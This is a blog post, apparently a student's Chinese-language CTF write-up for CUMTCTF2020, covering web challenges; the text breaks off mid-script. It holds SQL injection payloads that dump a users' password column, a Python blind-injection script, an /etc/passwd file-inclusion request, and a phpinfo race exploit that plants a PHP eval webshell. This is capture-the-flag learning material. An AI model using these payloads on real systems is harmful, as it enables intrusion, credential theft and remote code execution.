<!DOCTYPE html>


  <html class="dark page-post">


<head>
  <meta charset="utf-8">
  
  <title>CUMTCTF2020 | pz1o</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="WP," />
  

  <meta name="description" content="CUMTCTF2020第一次打比赛，大三的师傅们好强 webWeb签到 get传入参数1，post传入参数2，然后文件包含flag.php，查看源码拿flag 1#CUMTCTF&amp;#123;179055b4-e8f5-42d2-bfe4-027d15e946b2&amp;#125; Babysqli过滤空格的sql注入，可以用&#x2F;**&#x2F;绕过,用union注入 payload 123456789#查表1&amp;#">
<meta property="og:type" content="article">
<meta property="og:title" content="CUMTCTF2020">
<meta property="og:url" content="https://pz1o.top/2020/09/25/CUMTCTF2020/index.html">
<meta property="og:site_name" content="pz1o">
<meta property="og:description" content="CUMTCTF2020第一次打比赛，大三的师傅们好强 webWeb签到 get传入参数1，post传入参数2，然后文件包含flag.php，查看源码拿flag 1#CUMTCTF&amp;#123;179055b4-e8f5-42d2-bfe4-027d15e946b2&amp;#125; Babysqli过滤空格的sql注入，可以用&#x2F;**&#x2F;绕过,用union注入 payload 123456789#查表1&amp;#">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://pz1o.top/2020/09/25/CUMTCTF2020/image-20200925183359837.png">
<meta property="og:image" content="https://pz1o.top/2020/09/25/CUMTCTF2020/image-20200925185006355.png">
<meta property="og:image" content="https://pz1o.top/2020/09/25/CUMTCTF2020/image-20200925185651724.png">
<meta property="article:published_time" content="2020-09-25T11:00:00.000Z">
<meta property="article:modified_time" content="2021-03-03T07:23:27.835Z">
<meta property="article:author" content="pz1o">
<meta property="article:tag" content="WP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pz1o.top/2020/09/25/CUMTCTF2020/image-20200925183359837.png">

  

  
    <link rel="icon" href="/favicon.ico">
  

  <link href="/css/styles.css?v=c114cbeddx" rel="stylesheet">


  
    
<link rel="stylesheet" href="/css/personal-style.css">

  

  
<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-38189205-1', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->


  
  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?e90b4c8b8c36ca2b3e5798ef67088f84";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>


  
  <script type="text/javascript">
	(function(){
	    var bp = document.createElement('script');
	    var curProtocol = window.location.protocol.split(':')[0];
	    if (curProtocol === 'https') {
	        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
	    }
	    else {
	        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
	    }
	    var s = document.getElementsByTagName("script")[0];
	    s.parentNode.insertBefore(bp, s);
	})();
  </script>



  
    <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.3.0/css/font-awesome.min.css">
  

<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="pz1o" type="application/atom+xml">
</head>

<body>


  
    <span id="toolbox-mobile" class="toolbox-mobile">MAP</span>
  

  <div class="post-header LEFT">
   
  <div class="toolbox">
    <a class="toolbox-entry" href="/">
      <span class="toolbox-entry-text">MAP</span>
      <i class="icon-angle-down"></i>
      <i class="icon-home"></i>
    </a>
    <ul class="list-toolbox">
      
        <li class="item-toolbox">
          <a
            class="ROUND_RECT"
            href="/archives/"
            rel="noopener noreferrer"
            target="_self"
            >
            Blog
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="ROUND_RECT"
            href="/tag/"
            rel="noopener noreferrer"
            target="_self"
            >
            Tag
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="ROUND_RECT"
            href="/about/"
            rel="noopener noreferrer"
            target="_self"
            >
            About
          </a>
        </li>
      
    </ul>
  </div>


</div>


  <div id="toc" class="toc-article">
    <strong class="toc-title">Posts List</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CUMTCTF2020"><span class="toc-text">CUMTCTF2020</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web"><span class="toc-text">web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web签到"><span class="toc-text">Web签到</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Babysqli"><span class="toc-text">Babysqli</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Secret"><span class="toc-text">Secret</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Babysqli2"><span class="toc-text">Babysqli2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Try-GET-file"><span class="toc-text">Try:GET_file</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#re"><span class="toc-text">re</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#连个签到的分都不给你"><span class="toc-text">连个签到的分都不给你</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#python题禁止py"><span class="toc-text">python题禁止py</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#兄弟们快来帮帮萄萄"><span class="toc-text">兄弟们快来帮帮萄萄</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#pwn"><span class="toc-text">pwn</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#test-nc"><span class="toc-text">test_nc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#babystack"><span class="toc-text">babystack</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#crypto"><span class="toc-text">crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#幼儿园的密码题"><span class="toc-text">幼儿园的密码题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#小学生的密码题"><span class="toc-text">小学生的密码题</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#misc"><span class="toc-text">misc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#真·签到题"><span class="toc-text">真·签到题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#别做题了听歌吧"><span class="toc-text">别做题了听歌吧</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#大鲨鱼之你可劲找"><span class="toc-text">大鲨鱼之你可劲找</span></a></li></ol></li></ol>
  </div>



<div class="content content-post LEFT">
   <article id="post-CUMTCTF2020" class="article article-type-post" itemprop="blogPost">
  <header class="article-header">
    <h1 class="post-title">CUMTCTF2020</h1>

    <div class="article-meta">
      <span>
        <i class="icon-calendar"></i>
        <span>2020.09.25</span>
      </span>

      
        <span class="article-author">
          <i class="icon-user"></i>
          <span>pz1o</span>
        </span>
      

      
  <span class="article-category">
    <i class="icon-list"></i>
    <a class="article-category-link" href="/categories/CTF/">CTF</a>
  </span>



      

      
      <i class="fa fa-eye"></i> 
        <span id="busuanzi_container_page_pv">
           &nbsp热度 <span id="busuanzi_value_page_pv">
           <i class="fa fa-spinner fa-spin"></i></span>℃
        </span>
      
      
    </div>
  </header>

  <div class="article-content">
    
      <a id="more"></a>
<h1 id="CUMTCTF2020"><a href="#CUMTCTF2020" class="headerlink" title="CUMTCTF2020"></a>CUMTCTF2020</h1><p>第一次打比赛，大三的师傅们好强</p>
<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="Web签到"><a href="#Web签到" class="headerlink" title="Web签到"></a>Web签到</h2><p><img src="/2020/09/25/CUMTCTF2020/image-20200925183359837.png" alt="image-20200925183359837"></p>
<p>get传入参数1，post传入参数2，然后文件包含flag.php，查看源码拿flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">#CUMTCTF&#123;179055b4-e8f5-42d2-bfe4-027d15e946b2&#125;</span><br></pre></td></tr></table></figure>
<h2 id="Babysqli"><a href="#Babysqli" class="headerlink" title="Babysqli"></a>Babysqli</h2><p>过滤空格的sql注入，可以用/**/绕过,用union注入</p>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#查表</span><br><span class="line">1&#39;&#x2F;**&#x2F;union&#x2F;**&#x2F;select&#x2F;**&#x2F;1,2,3,(select&#x2F;**&#x2F;group_concat(table_name)&#x2F;**&#x2F;from&#x2F;**&#x2F;information_schema.tables&#x2F;**&#x2F;where&#x2F;**&#x2F;table_schema&#x3D;database()),5,6,7,8#</span><br><span class="line">#emails,users</span><br><span class="line">1&#39;&#x2F;**&#x2F;union&#x2F;**&#x2F;select&#x2F;**&#x2F;1,2,3,(select&#x2F;**&#x2F;group_concat(column_name)&#x2F;**&#x2F;from&#x2F;**&#x2F;information_schema.columns&#x2F;**&#x2F;where&#x2F;**&#x2F;table_name&#x3D;&#39;emails&#39;),5,6,7,8#</span><br><span class="line">#id,email_id</span><br><span class="line">1&#39;&#x2F;**&#x2F;union&#x2F;**&#x2F;select&#x2F;**&#x2F;1,2,3,(select&#x2F;**&#x2F;group_concat(column_name)&#x2F;**&#x2F;from&#x2F;**&#x2F;information_schema.columns&#x2F;**&#x2F;where&#x2F;**&#x2F;table_name&#x3D;&#39;users&#39;),5,6,7,8#</span><br><span class="line">#user_id,first_name,last_name,user,password,avatar,last_login,failed_login</span><br><span class="line">1&#39;&#x2F;**&#x2F;union&#x2F;**&#x2F;select&#x2F;**&#x2F;1,2,3,(select&#x2F;**&#x2F;group_concat(password)&#x2F;**&#x2F;from&#x2F;**&#x2F;users),5,6,7,8#</span><br><span class="line">#CUMTCTF&#123;27ec8034-c9fe-0cfd-d92a-84362ecf0e42&#125;</span><br></pre></td></tr></table></figure>
<h2 id="Secret"><a href="#Secret" class="headerlink" title="Secret"></a>Secret</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view-source:http:&#x2F;&#x2F;202.119.201.197:13005&#x2F;secret.jpg</span><br></pre></td></tr></table></figure>
<p>直接看图片的源代码，发现后面有php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include_once</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'param1'</span>]))</span><br><span class="line">&#123;</span><br><span class="line">    $str1=$_GET[<span class="string">'param1'</span>];</span><br><span class="line">    <span class="keyword">if</span>(file_get_contents($str1)!==<span class="string">'Suvin_wants_a_girlfriend'</span>)</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Suvin doesn't like you"</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'param2'</span>]))&#123;</span><br><span class="line">        $str2=$_GET[<span class="string">'param2'</span>];</span><br><span class="line">        <span class="keyword">if</span>(!is_numeric($str2))</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'Suvin prefers strings of Numbers'</span>);</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>($str2&lt;<span class="number">3600</span>*<span class="number">24</span>*<span class="number">30</span>)</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'Suvin says the num is too short'</span>);</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>($str2&gt;<span class="number">3600</span>*<span class="number">24</span>*<span class="number">31</span>)</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'Suvin says the num is too long'</span>);</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">"Suvin says he's falling in love with you!"</span>.<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">            sleep(intval($str2)); </span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'param1'</span>]) &amp;&amp; <span class="keyword">isset</span>($_POST[<span class="string">'param2'</span>])) &#123;</span><br><span class="line">            $str1=$_POST[<span class="string">'param1'</span>];</span><br><span class="line">            $str2=$_POST[<span class="string">'param2'</span>];</span><br><span class="line">            <span class="keyword">if</span>(strlen($str1)&gt;<span class="number">1000</span>)</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">"It's too long"</span>);</span><br><span class="line">            <span class="keyword">if</span>(((string)$str1!==(string)$str2)&amp;&amp;(sha1($str1)===sha1($str2)))</span><br><span class="line">                <span class="keyword">echo</span> $flag;</span><br><span class="line">            <span class="keyword">else</span> </span><br><span class="line">                <span class="keyword">die</span>(<span class="string">"It's so similar to md5"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>首先get传入param1要和一个字符串相等可以用data://</p>
<p>get传入param2要判断这个参数是否是数字并且要限制了范围，在加上有sleep，很自然的就想到了科学计数法</p>
<p>因此payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;202.119.201.197:13005&#x2F;index.php?param2&#x3D;0.26e07&amp;param1&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,Suvin_wants_a_girlfriend</span><br></pre></td></tr></table></figure>
<p>接下来是post的两个参数要的是字符串下的参数1和参数2不强等，但sha1加密强等，这里就不能用zhe数组绕过了</p>
<p>这里找两个sha1加密的不一样的字符串,找的是那个pdf，然后提取前面的内容即可，最后抓包改参数1和参数2拿flag</p>
<p><img src="/2020/09/25/CUMTCTF2020/image-20200925185006355.png" alt="image-20200925185006355"></p>
<h2 id="Babysqli2"><a href="#Babysqli2" class="headerlink" title="Babysqli2"></a>Babysqli2</h2><p>过滤了<strong>单引号和字符串截断函数substr()和mid()</strong>并且无回显，因为有正确和错误登录界面那应该就是盲注了</p>
<p>这里用left来截取字符串，并且用十六进制来替换单引号及其里面的内容</p>
<p>直接放脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="comment">#dict = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.-&#123;&#125;,'</span></span><br><span class="line">dict=<span class="string">'''1234567890~`!@#$%^&amp;*()-_=+[]&#123;&#125;;:'"|\,&lt;.&gt;/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''</span></span><br><span class="line">url = <span class="string">'http://202.119.201.197:13004/index.php'</span></span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line">j = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">400</span>):</span><br><span class="line">    <span class="keyword">for</span> a <span class="keyword">in</span> dict:</span><br><span class="line">        <span class="comment">#payload = "or/**/1=(case/**/when/**/(left(database(),&#123;&#125;)=0x&#123;&#125;)/**/then/**/1/**/else/**/0/**/end)#".format(i, binascii.b2a_hex(j + a))</span></span><br><span class="line">        <span class="comment">#payload = "or/**/1=(case/**/when/**/(left((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),&#123;&#125;)=0x&#123;&#125;)/**/then/**/1/**/else/**/0/**/end)#".format(i,binascii.b2a_hex(j+a))</span></span><br><span class="line">        <span class="comment">#payload = "or/**/1=(case/**/when/**/(left((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x7573657273),&#123;&#125;)=0x&#123;&#125;)/**/then/**/1/**/else/**/0/**/end)#".format(i,binascii.b2a_hex(j + a))</span></span><br><span class="line">        payload = <span class="string">"or/**/1=(case/**/when/**/(left((select/**/group_concat(password)/**/from/**/users),&#123;&#125;)=0x&#123;&#125;)/**/then/**/1/**/else/**/0/**/end)#"</span>.format(i, binascii.b2a_hex(j + a))</span><br><span class="line">        <span class="comment">#print(payload)</span></span><br><span class="line">        <span class="comment">#cumtctf</span></span><br><span class="line">        <span class="comment">#emails users</span></span><br><span class="line">        <span class="comment">#id id username,password</span></span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">'username'</span> : <span class="string">"100\\"</span>,</span><br><span class="line">            <span class="string">'password'</span> : payload</span><br><span class="line">        &#125;</span><br><span class="line">        r = requests.session()</span><br><span class="line">        res = r.post(url=url,data=data)</span><br><span class="line">        <span class="comment">#print(res.content)</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">'Wrong username'</span> <span class="keyword">not</span> <span class="keyword">in</span> res.content:</span><br><span class="line">            j += a</span><br><span class="line">            flag +=a</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    print(flag)</span><br></pre></td></tr></table></figure>
<p>好像是在最后，多跑一会就出来了</p>
<h2 id="Try-GET-file"><a href="#Try-GET-file" class="headerlink" title="Try:GET_file"></a>Try:GET_file</h2><p>先扫目录发现有phpinfo.php</p>
<p>包含一下发现有文件包含漏洞</p>
<p>之后又包含敏感文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file&#x3D;&#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>
<p><img src="/2020/09/25/CUMTCTF2020/image-20200925185651724.png" alt="image-20200925185651724"></p>
<p>这里有一个phpinfo上传文件再包含</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">在给PHP发送POST数据包时，如果数据包里包含文件区块，无论访问的代码中是否有处理文件上传的逻辑，php都会将这个文件保存成一个临时文件（通常是&#x2F;tmp&#x2F;php[6个随机字符]），这个临时文件在请求结束后就会被删除，同时，phpinfo页面会将当前请求上下文中所有变量都打印出来。但是文件包含漏洞和phpinfo页面通常是两个页面，理论上我们需要先发送数据包给phpinfo页面，然后从返回页面中匹配出临时文件名，将这个文件名发送给文件包含漏洞页面。</span><br><span class="line"></span><br><span class="line">因为在第一个请求结束时，临时文件就会被删除，第二个请求就无法进行包含。</span><br><span class="line"></span><br><span class="line">但是这并不代表我们没有办法去利用这点上传恶意文件，只要发送足够多的数据，让页面还未反应过来，就上传我们的恶意文件，然后文件包含：</span><br><span class="line"></span><br><span class="line">1）发送包含了webshell的上传数据包给phpinfo，这个数据包的header，get等位置一定要塞满垃圾数据；</span><br><span class="line"></span><br><span class="line">2）phpinfo这时会将所有数据都打印出来，其中的垃圾数据会将phpinfo撑得非常大</span><br><span class="line"></span><br><span class="line">3）PHP默认缓冲区大小是4096，即PHP每次返回4096个字节给socket连接</span><br><span class="line"></span><br><span class="line">4）所以，我们直接操作原生socket，每次读取4096个字节，只要读取到的字符里包含临时文件名，就立即发送第二个数据包</span><br><span class="line"></span><br><span class="line">5）此时，第一个数据包的socket连接其实还没有结束，但是PHP还在继续每次输出4096个字节，所以临时文件还未被删除</span><br><span class="line"></span><br><span class="line">6）我们可以利用这个时间差，成功包含临时文件，最后getshell</span><br></pre></td></tr></table></figure>
<p>这里有现成的exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python </span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">setup</span><span class="params">(host, port)</span>:</span></span><br><span class="line">    TAG=<span class="string">"Security Test"</span></span><br><span class="line">    PAYLOAD=<span class="string">"""%s\r</span></span><br><span class="line"><span class="string">&lt;?php file_put_contents('/tmp/g', '&lt;?=eval($_REQUEST[1])?&gt;')?&gt;\r"""</span> % TAG</span><br><span class="line">    REQ1_DATA=<span class="string">"""-----------------------------7dbff1ded0714\r</span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r</span></span><br><span class="line"><span class="string">Content-Type: text/plain\r</span></span><br><span class="line"><span class="string">\r</span></span><br><span class="line"><span class="string">%s</span></span><br><span class="line"><span class="string">-----------------------------7dbff1ded0714--\r"""</span> % PAYLOAD</span><br><span class="line">    padding=<span class="string">"A"</span> * <span class="number">5000</span></span><br><span class="line">    REQ1=<span class="string">"""POST /phpinfo.php?a="""</span>+padding+<span class="string">""" HTTP/1.1\r</span></span><br><span class="line"><span class="string">Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""</span>+padding+<span class="string">"""\r</span></span><br><span class="line"><span class="string">HTTP_ACCEPT: """</span> + padding + <span class="string">"""\r</span></span><br><span class="line"><span class="string">HTTP_USER_AGENT: """</span>+padding+<span class="string">"""\r</span></span><br><span class="line"><span class="string">HTTP_ACCEPT_LANGUAGE: """</span>+padding+<span class="string">"""\r</span></span><br><span class="line"><span class="string">HTTP_PRAGMA: """</span>+padding+<span class="string">"""\r</span></span><br><span class="line"><span class="string">Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r</span></span><br><span class="line"><span class="string">Content-Length: %s\r</span></span><br><span class="line"><span class="string">Host: %s\r</span></span><br><span class="line"><span class="string">\r</span></span><br><span class="line"><span class="string">%s"""</span> %(len(REQ1_DATA),host,REQ1_DATA)</span><br><span class="line">    <span class="comment">#modify this to suit the LFI script   </span></span><br><span class="line">    LFIREQ=<span class="string">"""GET /index.php?file=%s HTTP/1.1\r</span></span><br><span class="line"><span class="string">User-Agent: Mozilla/4.0\r</span></span><br><span class="line"><span class="string">Proxy-Connection: Keep-Alive\r</span></span><br><span class="line"><span class="string">Host: %s\r</span></span><br><span class="line"><span class="string">\r</span></span><br><span class="line"><span class="string">\r</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line">    <span class="keyword">return</span> (REQ1, TAG, LFIREQ)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">phpInfoLFI</span><span class="params">(host, port, phpinforeq, offset, lfireq, tag)</span>:</span></span><br><span class="line">    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line"></span><br><span class="line">    s.connect((host, port))</span><br><span class="line">    s2.connect((host, port))</span><br><span class="line"></span><br><span class="line">    s.send(phpinforeq)</span><br><span class="line">    d = <span class="string">""</span></span><br><span class="line">    <span class="keyword">while</span> len(d) &lt; offset:</span><br><span class="line">        d += s.recv(offset)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        i = d.index(<span class="string">"[tmp_name] =&amp;gt; "</span>)</span><br><span class="line">        fn = d[i+<span class="number">17</span>:i+<span class="number">31</span>]</span><br><span class="line">    <span class="keyword">except</span> ValueError:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">    s2.send(lfireq % (fn, host))</span><br><span class="line">    d = s2.recv(<span class="number">4096</span>)</span><br><span class="line">    s.close()</span><br><span class="line">    s2.close()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> d.find(tag) != <span class="number">-1</span>:</span><br><span class="line">        <span class="keyword">return</span> 